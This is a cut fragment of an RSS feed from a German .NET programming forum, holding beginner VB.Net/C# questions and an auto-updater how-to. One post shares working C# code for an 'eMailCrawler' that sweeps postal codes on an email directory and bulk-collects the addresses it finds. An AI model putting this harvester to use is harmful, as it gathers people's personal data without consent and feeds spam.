jedoch scheitere ich...</description>
			<content:encoded><![CDATA[<div>Moin,<br />
<br />
ich wollte ein Programm für den privatgebrauch schreiben, welches mir Datein automatisch nacheinander downloaded,<br />
jedoch scheitere ich schon da dran, die URL zu durch die POST-Methode zu übergeben und dann den filedownload auszuführen...<br />
<br />
Ich hab mir ein bisschen zusammen gegoogelt, vllt kann mir ja einer helfen.<br />
<br />
Was mache ich falsch?<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; &nbsp; &nbsp; Dim Url As String = &quot;http://account-boerse.com/download.php&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; <br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim postData As String = &quot;url=http%3A%2F%2Fuploaded.to%2Ffile%2F3hu7ubkk&amp;x=19&amp;y=25&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim request As HttpWebRequest<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim response As HttpWebResponse<br />
&nbsp; &nbsp; &nbsp; &nbsp; request = CType(WebRequest.Create(Url), HttpWebRequest)<br />
&nbsp; &nbsp; &nbsp; &nbsp; request.ContentType = &quot;application/x-www-form-urlencoded&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; request.ContentLength = postData.Length<br />
&nbsp; &nbsp; &nbsp; &nbsp; request.Method = &quot;POST&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; request.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; request.Referer = Url<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim requestStream As Stream = request.GetRequestStream()<br />
&nbsp; &nbsp; &nbsp; &nbsp; <br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim postBytes As Byte() = Encoding.ASCII.GetBytes(postData)<br />
&nbsp; &nbsp; &nbsp; &nbsp; requestStream.Write(postBytes, 0, postBytes.Length)<br />
&nbsp; &nbsp; &nbsp; &nbsp; response = CType(request.GetResponse(), HttpWebResponse)<br />
<br />
<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim fs As New FileStream(&quot;c:\abc.rar&quot;, FileMode.Create)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim read As Byte() = New Byte(255) {}<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim count As Integer = requestStream.Read(read, 0, read.Length)<br />
&nbsp; &nbsp; &nbsp; &nbsp; While count &gt; 0<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; fs.Write(read, 0, count)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; count = requestStream.Read(read, 0, read.Length)<br />
&nbsp; &nbsp; &nbsp; &nbsp; End While<br />
&nbsp; &nbsp; &nbsp; &nbsp; fs.Close()<br />
&nbsp; &nbsp; &nbsp; &nbsp; response.Close()<br />
&nbsp; &nbsp; &nbsp; &nbsp; requestStream.Close()<br />
&nbsp; &nbsp; &nbsp; &nbsp; MsgBox(&quot;FERTIG&quot;)</code><hr />
</div><br />
Fehler bei der Zeile<br />
<br />
ist: Lesevorgänge werden vom Stream nicht unterstützt.<br />
Dim count As Integer = requestStream.Read(read, 0, read.Length)<br />
LG<br />
Baumstumpf</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Baumstumpf</dc:creator>
			<guid isPermaLink="true">net-94/account-boerse-download-16309</guid>
		</item>
		<item>
			<title>VB.Net Wörter aus Quelltext auslesen?</title>
			<link>net-94/woerter-aus-quelltext-auslesen-16142?goto=newpost</link>
			<pubDate>Fri, 07 Sep 2012 17:40:00 GMT</pubDate>
			<description>Hey. 
 
Wenn auf einer Seite eine Liste mit Wörtern steht: 
http://i50.tinypic.com/28hod3t.png 
 
Das ist die Seite: 
Boggle Solver - Boggle Cheat...</description>
			<content:encoded><![CDATA[<div>Hey.<br />
<br />
Wenn auf einer Seite eine Liste mit Wörtern steht:<br />
<a href="http://i50.tinypic.com/28hod3t.png" target="_blank" rel="nofollow">http://i50.tinypic.com/28hod3t.png</a><br />
<br />
Das ist die Seite:<br />
<a href="http://www.scramblewithfriends-cheat.com/boggle-solver" target="_blank" rel="nofollow">Boggle Solver - Boggle Cheat and Boggle Dictionary</a><br />
<br />
Ihr müsst einfach mal irgendwelche 16 Buchstaben eingeben und dann den Quelltext anschauen, könnte man die Wörter automatisch schreiben lassen<br />
mit VB?<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/woerter-aus-quelltext-auslesen-16142</guid>
		</item>
		<item>
			<title>VB.Net Programm in der Form anzeigen und benutzen</title>
			<link>net-94/programm-in-der-form-anzeigen-benutzen-16079?goto=newpost</link>
			<pubDate>Tue, 04 Sep 2012 11:22:11 GMT</pubDate>
			<description>wie kann ich ein programm in einer form benutzen? 
 
Die form soll geöffnet werden und beispiel das programm photoshop soll in dieser form geöffnet...</description>
			<content:encoded><![CDATA[<div>wie kann ich ein programm in einer form benutzen?<br />
<br />
Die form soll geöffnet werden und beispiel das programm photoshop soll in dieser form geöffnet sein.<br />
<br />
wie geht das? ich habe gehört das würde funktionieren</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Kezox</dc:creator>
			<guid isPermaLink="true">net-94/programm-in-der-form-anzeigen-benutzen-16079</guid>
		</item>
		<item>
			<title>C# UserList neu auslesen ?</title>
			<link>net-94/userlist-neu-auslesen-15945?goto=newpost</link>
			<pubDate>Tue, 28 Aug 2012 19:35:23 GMT</pubDate>
			<description>Hallo, 
 
habe ein Problem wie bekomme ich das hin das wenn ich mit dem Bot denn Channel Wechsel  das der UserList nicht als z.B 
 
James 
Peter...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
habe ein Problem wie bekomme ich das hin das wenn ich mit dem Bot denn Channel Wechsel  das der UserList nicht als z.B<br />
<br />
<font color="Red">James</font><br />
<font color="Blue">Peter</font><br />
<font color="Black">Hans</font><br />
<font color="Blue">Lauch</font><br />
<font color="Red">James</font><br />
<font color="blue">Lisa</font><br />
<font color="Lime">Peter</font><br />
<font color="Red">James</font><br />
<font color="Blue">Frank</font><br />
<div style="text-align: center;">Anzeigt?</div><br />
<br />
<br />
Mfg<br />
Adrian</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>AmJano</dc:creator>
			<guid isPermaLink="true">net-94/userlist-neu-auslesen-15945</guid>
		</item>
		<item>
			<title>VB.Net Resourcenname in einem Label anzeigen</title>
			<link>net-94/resourcenname-in-einem-label-anzeigen-15893?goto=newpost</link>
			<pubDate>Sun, 26 Aug 2012 13:52:29 GMT</pubDate>
			<description>Hi. 
 
Wenn ich bei mir in einer ComboBox etwas auswähle, wird ein Bild geöffnet. Der Name des Bildes (Resource) soll in einem Label angezeigt...</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Wenn ich bei mir in einer ComboBox etwas auswähle, wird ein Bild geöffnet. Der Name des Bildes (Resource) soll in einem Label angezeigt werden.<br />
<br />
Wie geht das?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/resourcenname-in-einem-label-anzeigen-15893</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [HowTo] Update-Funktion]]></title>
			<link>net-94/howto-update-funktion-15775?goto=newpost</link>
			<pubDate>Tue, 21 Aug 2012 09:36:43 GMT</pubDate>
			<description>Hallo, 
da vorher jemand gefragt hat wie man in VB.Net am besten einen Updater realisiert, habe 
ich mich dazu entschlossen ein kleine Funktion dafür...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
da vorher jemand gefragt hat wie man in VB.Net am besten einen Updater realisiert, habe<br />
ich mich dazu entschlossen ein kleine Funktion dafür zu schreiben.<br />
<br />
Funktionsweise:<br />
Ihr habt 2 .txt's auf einem Webspace. Eine mit der aktuellen Version(text) und eine mit der<br />
URL wo man die aktuellste Version downloaden kann.<br />
<br />
z.B.<br />
<br />
version.txt<br />
Inhalt: 1.0.0<br />
<br />
path.txt<br />
Inhalt: <a href="http://deineUrl.de/new.exe/" target="_blank" rel="nofollow">http://deineUrl.de/new.exe/</a><br />
<br />
Im Source müsst ihr das natürlich<br />
auf die Variable 'version' anpassen. Falls eine neue Version verfügbar ist, wird man<br />
gefragt ob man sie downloaden will. Wenn ja, wird ein Dialog geöffnet um den Pfad<br />
auszusuchen und die neue Version wird heruntergeladen.<br />
<br />
Folgende Variablen werden benötigt:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;ofd&nbsp;</span><span style="color: #007700">As&nbsp;New&nbsp;</span><span style="color: #0000BB">FolderBrowserDialog<br />&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;urlVersion&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"http://127.0.0.1/version.txt"<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dim&nbsp;urlPath&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"http://127.0.0.1/path.txt"<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dim&nbsp;version&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"0.0.1"<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dim&nbsp;nPath&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dim&nbsp;nVersion&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dim&nbsp;WithEvents&nbsp;wc&nbsp;</span><span style="color: #007700">As&nbsp;New&nbsp;</span><span style="color: #0000BB">WebClient&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Hier ist die eigentliche Funktion:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;checkForUpdate</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">nPath&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">wc</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadString</span><span style="color: #007700">(</span><span style="color: #0000BB">urlPath</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">nVersion&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">wc</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadString</span><span style="color: #007700">(</span><span style="color: #0000BB">urlVersion</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Catch&nbsp;</span><span style="color: #0000BB">ex&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Exception<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MessageBox</span><span style="color: #007700">.</span><span style="color: #0000BB">Show</span><span style="color: #007700">(</span><span style="color: #DD0000">"Keine&nbsp;Verbindung!"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Exit&nbsp;</span><span style="color: #0000BB">Sub<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;</span><span style="color: #007700">Try<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;</span><span style="color: #0000BB">Not&nbsp;nVersion&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">version&nbsp;Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;r&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">MsgBoxResult&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">MsgBox</span><span style="color: #007700">(</span><span style="color: #DD0000">"Eine&nbsp;neue&nbsp;Version&nbsp;ist&nbsp;verfügbar!&nbsp;Downloaden?"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">MsgBoxStyle</span><span style="color: #007700">.</span><span style="color: #0000BB">YesNo</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;</span><span style="color: #0000BB">r&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">MsgBoxResult</span><span style="color: #007700">.</span><span style="color: #0000BB">Yes&nbsp;Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ofd</span><span style="color: #007700">.</span><span style="color: #0000BB">ShowDialog</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">wc</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadFileAsync</span><span style="color: #007700">(New&nbsp;</span><span style="color: #0000BB">Uri</span><span style="color: #007700">(</span><span style="color: #0000BB">nPath</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">ofd</span><span style="color: #007700">.</span><span style="color: #0000BB">SelectedPath&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #DD0000">"\Updater"&nbsp;</span><span style="color: #007700">&amp;&nbsp;</span><span style="color: #0000BB">nVersion&nbsp;</span><span style="color: #007700">&amp;&nbsp;</span><span style="color: #DD0000">".exe"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Catch&nbsp;</span><span style="color: #0000BB">ex&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Exception<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MessageBox</span><span style="color: #007700">.</span><span style="color: #0000BB">Show</span><span style="color: #007700">(</span><span style="color: #DD0000">"Keine&nbsp;Verbindung!"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">Try<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">If<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">MessageBox</span><span style="color: #007700">.</span><span style="color: #0000BB">Show</span><span style="color: #007700">(</span><span style="color: #DD0000">"Kein&nbsp;Update&nbsp;verfügbar!"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">If<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Sub&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Dann brauchen wir noch das ProgressBarChangeValue-Event:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;w_DownloadProgressChanged</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Net</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadProgressChangedEventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;wc</span><span style="color: #007700">.</span><span style="color: #0000BB">DownloadProgressChanged<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ProgressBar1</span><span style="color: #007700">.</span><span style="color: #0000BB">Value&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">ProgressPercentage<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Und so ruft man das ganze auf:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">checkForUpdate</span><span style="color: #007700">()&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Die ProgressBar wird natürlich nicht zwangsweise benötigt.<br />
<br />
Bei Fragen fragen!<br />
<br />
MfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/howto-update-funktion-15775</guid>
		</item>
		<item>
			<title>VB.Net Bild von einer Form zur anderen?</title>
			<link>net-94/bild-einer-form-zur-anderen-15741?goto=newpost</link>
			<pubDate>Sun, 19 Aug 2012 19:11:38 GMT</pubDate>
			<description>Hi. 
 
Muss leider nochmal eine letzte Frage stellen, und zwar: 
 
Ich habe in meinem Programm um die 50 Bilder anzuzeigen, ich habe natürlich kein...</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Muss leider nochmal eine letzte Frage stellen, und zwar:<br />
<br />
Ich habe in meinem Programm um die 50 Bilder anzuzeigen, ich habe natürlich kein Bock 50 Formen zu erstellen mit jeweils 1 PictureBox und dann immer wenn ein Text ausgewählt wird eine andere Form anzuzeigen wäre zu viel Arbeit.<br />
<br />
Ich habe jetzt nur eine Form, und zwar Form5 mit einer PictureBox.<br />
<br />
Kann ich die Bilder irgendwie per Klick anzeigen lassen, ohne die alle in 1 Ordner zu haben bzw. die im Internet hochzuladen und immer den Link aufrufen zu lassen?<br />
<br />
Habe mir das irgendwie gedacht das ich noch Form6 erstelle, dort 50 Bilder draufpacke und wenn auf der Hauptform z.B.<br />
<br />
abc angeklickt wird, öffnet sich Form5 mit dem Bild von abc. Wenn def angeklickt wird, öffnet sich die selbe Form mit dem Bild für efg. <br />
<br />
Geht das irgendwie das ich also ein Bild von Form6 auf 5 übertrage? :S</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/bild-einer-form-zur-anderen-15741</guid>
		</item>
		<item>
			<title>VB.Net Auswahl ComboBox1 dann Texte zu ComboBox2 einfügen</title>
			<link>net-94/auswahl-combobox1-dann-texte-zu-combobox2-einfuegen-15727?goto=newpost</link>
			<pubDate>Sun, 19 Aug 2012 12:32:31 GMT</pubDate>
			<description><![CDATA[Hallo. 
 
Wenn ich jetzt bei ComboBox1 mehrere Texte untereinander stehen habe, zum Beispiel: 
- 123 
- 456 
 
Wenn jetzt zum Beispiel "123"...]]></description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Wenn ich jetzt bei ComboBox1 mehrere Texte untereinander stehen habe, zum Beispiel:<br />
- 123<br />
- 456<br />
<br />
Wenn jetzt zum Beispiel &quot;123&quot; ausgewählt wird, sollen dann bestimmte Dinge in der ComboBox2 gelistet werden.<br />
<br />
If ComboBox1.Text = &quot;123&quot; Then<br />
ComboBox2.Text = &quot;...&quot;<br />
<br />
Wie liste ich da jetzt bei ComboBox2 mehrere Dinge untereinander? z.B. &quot;abc&quot; und &quot;cfg&quot;<br />
<br />
MfG.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/auswahl-combobox1-dann-texte-zu-combobox2-einfuegen-15727</guid>
		</item>
		<item>
			<title><![CDATA[[Source] eMailCrawler]]></title>
			<link>net-94/source-emailcrawler-15525?goto=newpost</link>
			<pubDate>Sat, 11 Aug 2012 09:30:00 GMT</pubDate>
			<description>Guten Morgen, ist eben aus Langeweile entstanden, vielleicht kann jemand eine Menge eMail-Adressen gebrauchen :) 
 
C# Code: 
 
Code: 
---------...</description>
			<content:encoded><![CDATA[<div>Guten Morgen, ist eben aus Langeweile entstanden, vielleicht kann jemand eine Menge eMail-Adressen gebrauchen :)<br />
<br />
C# Code:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">using System;<br />
using System.Collections.Generic;<br />
using System.Linq;<br />
using System.Text;<br />
using System.Text.RegularExpressions;<br />
using System.IO;<br />
using System.Net;<br />
<br />
namespace eMailCrawler<br />
{<br />
&nbsp; &nbsp; class Program<br />
&nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; static void Main(string[] args)<br />
&nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.Title = &quot;eMailCrawler&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Bei welcher PLZ beginnen? (Empfohlen: 11111)&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int start = Convert.ToInt32(Console.ReadLine());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Bei welcher PLZ aufhören? (Empfohlen: 99999)&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int stop = Convert.ToInt32(Console.ReadLine());<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Crawl(start, stop);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Done.&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.ReadLine();<br />
&nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; static void Crawl(int start, int stop)<br />
&nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; for (int i = start; i &lt;= stop; i++)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(&quot;http://www.email-verzeichnis.de/email/search.php&quot;);<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; httpWebRequest.Method = &quot;POST&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; httpWebRequest.MediaType = &quot;HTTP/1.1&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; httpWebRequest.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; httpWebRequest.UserAgent = &quot;User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1&quot;;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; byte[] byteArrayData = Encoding.ASCII.GetBytes(&quot;begin=0&amp;name=&amp;plz=51545&amp;ort=&amp;land=Worldwide&amp;submit.x=85&amp;submit.y=31&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; httpWebRequest.ContentLength = byteArrayData.Length;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Stream dataStream = httpWebRequest.GetRequestStream();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; dataStream.Write(byteArrayData, 0, byteArrayData.Length);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; dataStream.Close();<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; HttpWebResponse httpWebesponse = (HttpWebResponse)httpWebRequest.GetResponse();<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; dataStream = httpWebesponse.GetResponseStream();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; StreamReader streamreader = new StreamReader(dataStream, Encoding.UTF8);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; string response = streamreader.ReadToEnd();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; streamreader.Close();<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Regex rx = new Regex(&quot;&amp;amp;name=(.+)\&quot;&gt;&lt;img height=&quot;);<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MatchCollection matches = rx.Matches(response);<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; foreach (Match match in matches)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; String newMatch = Convert.ToString(match);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; String matsche = newMatch.Replace(&quot;&amp;amp;name=&quot;, &quot;&quot;).Replace(&quot;\&quot;&gt;&lt;img height=&quot;, &quot;&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(matsche);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WebClient c = new WebClient();<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.DownloadString(&quot;http://localhost/email/index.php?adr=&quot; + matsche);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; }<br />
}</code><hr />
</div>PHP-Script:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
